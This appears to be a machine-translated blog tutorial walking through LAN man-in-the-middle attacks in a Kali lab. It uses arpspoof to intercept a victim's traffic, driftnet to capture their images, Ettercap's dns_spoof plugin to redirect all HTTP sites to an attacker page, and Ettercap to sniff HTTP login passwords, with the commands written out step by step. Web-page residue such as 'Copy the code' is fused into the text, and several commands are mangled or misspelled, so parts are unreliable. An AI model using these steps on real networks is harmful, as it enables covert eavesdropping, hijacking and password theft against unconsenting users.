This is the first day of my participation in the August Challenge. For details, see:August is more challenging
preface
Most of the wireless spoofing attacks are reflected by wireless man-in-the-middle attacks. Man-in-the-middle attack is a kind of “indirect” intrusion attack, through the interception, insert, forge, terminal data packet and other technical means, a computer controlled by the intruder is virtual placed between two communication computers in the network connection, this computer is called “man-in-the-middle”.
Infiltration is risky! Stop it!Copy the codeIntroduction to man-in-the-middle attacks
Most of the wireless spoofing attacks are reflected by wireless man-in-the-middle attacks. Man-in-the-middle attack is a kind of “indirect” intrusion attack, through the interception, insert, forge, terminal data packet and other technical means, a computer controlled by the intruder is virtual placed between two communication computers in the network connection, this computer is called “man-in-the-middle”.
Two, commonly used deception tools
There are spoofing toolkits in Kali Linux, including Ettercap, ARPSpoof, DNSChef, SSLStrip, etc.
3. Man-in-the middle attack (1) – ARpspoof + Drifrnet to achieve MiTM attack
1. Introduction to THE MiTM attack
MiTM attacks are implemented by hijacking traffic between two users that can be detected using tools such as Wireshark and other packet sniffers. In the next section of this article, you’ll see how Wireshark sniffs the details of each packet, which researchers can use to capture for later analysis. Suppose a foreign government spy is monitoring an expert’s computer. My job is to see if they have stolen any pictorial information, such as classified maps, plans, intellectual property, etc., from the expert’s computer. So, in order to understand the extent of the damage, I have to determine exactly what the content of the transmitted picture information is. First, I need to MitM to put myself between the target and the router. That way, I can monitor all the traffic. After finishing the MitM, I needed to use a tool called “Driftnet”, which is a piece of software designed to capture images above a data stream for a given interface. This allows me to store and display the picture information on my computer.
2. Arpspoof implements MiTM attack
At first, I had arpspoof and Ettercap as the methods for MiTM.
Ettercap, a popular network packet capture software, exploits a flaw in ARP, the protocol used by computers to communicate over a local area network (LAN). It acts as a middleman between a target and a server, sniffing traffic between them and stealing data from users. Arpspoof also performs APR spoofs, and while Ettercap is easier to use, ARpspoof is more reliable. So in the end, I decided to implement MiTM with ARpspoof.
1) Information collection
Get kali’s IP address
ifconfig192.168.200.129
Copy the code
Get the IP address of the victim
ipconfig192.168.200.134
Copy the code
2) Enable IP address forwarding
echo 1 >/proc/sys/net/ipv4/ip_forward
Copy the code
3) Start cheating
Arpspoof -i eth0 -t 192.168.200.134 192.168.200.1Copy the code
1. The "arpspoof -i nic -t target IP gateway IP "command is used to send the target data to the gateway through Kali. 2. The "arpspoof -i gateway IP target IP" command is used to send the data returned by the gateway to the target via Kali.Copy the code3. Driftnet receives pictures
Driftnet is a simple and easy-to-use photo capture tool that can capture images in network data packets. It also supports capturing and displaying audio files. It can be used to capture photos in wechat moments, weibo posts and more.
At this point, I should be able to see all the images sent or received by both parties, and the next thing I need to do is activate Driftnet. I can do this by typing Driftnet from any terminal in Kali, but remember, don’t use the open terminal where Arpspoof is running, as this will terminate arpspoof.
If Kali doesn’t have it, just download it
apt-get install driftnet
Copy the code
When you see the window fetching information, you can open the fetching tool
Driftnet -i eth0 (-i specifies the network interface to listen on)Copy the code
Using the victim’s computer to access the 4399 website, we caught the picture on Kali.
4. Solve the problem that Drifrnet cannot capture pictures
Drifrnet could not capture the image, this is related to arpspoof command
Online tutorials are mostly
Arpspoof -i [nic name] -t [victim IP] [gateway IP] arpspoof -i eth0 192.168.200.134 192.168.200.2Copy the codeIn this case, use the Wireshark to capture packets
We saw the data from eth0 on Kali, sifting through the victim’S IP, and we saw the traffic that caught the victim.
As you can see, all the captured requests are made by the victim’s IP (i.e. 192.168.200.134). According to the above command, I disguised myself as the gateway, and all the requests sent by other victims on the LAN were sent to me first. So, through the basic knowledge of computer network, if you want to capture the picture stream, the above command can only capture the local uploaded pictures. If you want to grab the requested image, you cannot use the above command.
Need to change to
Arpspoof -i \[nic name \] -t \[gateway IP\] \[victim IP\]arpspoof -i eth0 -t 192.168.200.1 192.168.200.134Copy the codeThe problem is if I want to capture both the request stream and the response stream
Arpspoof -i \[nic name \] -r \[gateway IP\] -t \[victim IP\]arpspoof -i eth0 -r 192.168.200.1 -t 192.168.200.134Copy the code
5. Permanently save the operation
Driftnet -i eth0-b-a-d directoryCopy the code
Man-in-the-middle attack (2) -ARP spoofing
1. Traffic forwarding
Only intercepts the traffic, the attacked host is easy to find the exception, how to monitor the attacked host unknowingly? This requires us to start the traffic forwarding function! Before performing DNS spoofing, check whether IP forwarding is enabled on the attack plane. Net.ipv4.ip_forward=0, IP forwarding is not enabled. You need to manually set it to 1.
Sysctl net.ipv4. IP \_forward# If the value is 0, run the following command to change it to 1sysctl -w net.ipv4. IP \_forward=1 or run the vi /etc/sysctl.conf commandCopy the code
2. Start the Apache service
service apache2 start
Copy the code
3. Modify DNS and design the page
1) Modify the DNS file in the convenient etterCap
vi /etc/ettercap/etter.dns
Copy the code
* A 192.168.200.129"*" indicates the page to be redirected to after DNS hijacking. For example, if "*" is changed to www.qq.com, the hijacked object will be redirected to the Apache page at 192.168.200.129 after accessing WWW.qq.com. Note A 192.168.200.129 indicates the IP address to be hijacked. Remember the local ETH NIC addressCopy the code2) Design the index.html file
This file is the home page file for the web site. You can modify the original index.html, or you can write a new page to replace the previous index.html.
<HTML><head><title>ARE YOU KIDDING</title><h1>hellow, test..... !!!!! </h1><body>SOMETHING FOR NOTHING! </body></head></HTML>Copy the codeTest access index.html
http://127.0.0.1/
Copy the code
4. Start the EtterCap GUI
1) Turn on the big spider
ettercap -G
Copy the code
The -g command enables the GUI mode. For those of you who don’t like to use the graphical interface, etterCap also has command line mode, and I’ll also attach etterCap DNS spoofing commands later.
2) Configure nics
For the local area network environment, select eth0.
Select a network adapter based on the actual situation
3) Introduce functions
Confirm eth0 network card, select good network card after click tick on the line
Start and stop the search
4) Scan for live hosts
Host->Scan for hosts->hosts list The number of hosts in the scanned network segment and list them.
5) List the scanned hosts
MAC and IP addresses of the hosts that can be discovered alive
6) Add the gateway and the listening host
Select 192.168.200.134 (victim Host) and click Add to Target1 to display: Host 192.168.200.134 Add to Target1
Then select 192.168.200.2 gateway and click Add to Target2. Host 192.168.200.1 Add to Target2 appears
7) Configure ARP poisoning
Enable ARP poisoning and select remote sniffing connection and remote eavesdropping
8) Configure plug-ins
Plugins->Manage Plugins, open dns_spoof plugin, open dns_spoof plugin… :
9) DNS hijacking succeeded
At this point, whenever the victim’s computer visits any HTTP site, it will be redirected to the index.html interface I specified
HTTP Web site
HTTPS protocol website
10) Analysis and inspection
View the ARP table of the victim
We see that the MAC address of the network adapter is the same as the MAC address of Kali, which cannot be the same in the correct case
Ping Found the hijacked IP address
We see kali’s address, if you want to stop arp hijacking, close the ARpspoof window.
5. Manin attack (3) Arpspoof +Ettercap sniffer password
1. Enable route forwarding
echo 1 >/proc/sys/net/ipv4/ip_forward
Copy the code
Use ARpspoof for attack spoofing
Arpspoof -i eth0 -t 192.168.200.134 (victim IP) 192.168.200.2 (gateway) arpspoof -i eth0 -r 192.168.200.2-t 192.168.200.134Copy the code
2. Use Ettercap to perform ARP spoofing
Sniff the HTTP login password
ettercap -Tq -i eth0
Copy the code
3. Obtain the password of the browsing user
Six summarize
First, what is a man in the middle and the way of attack. Using arpspoof+ Drifrnet tool to achieve the hijacking of traffic between two users to achieve MiTM attack. The ettercap tool is used to implement ARP spoofing and DNS hijacking attacks. Use the arpspoof+Ettercap tool to sniff the password. First, arpspoof attacks to cheat, and then Ettercap sniffs the login password in the HTTP protocol. [Penetration data]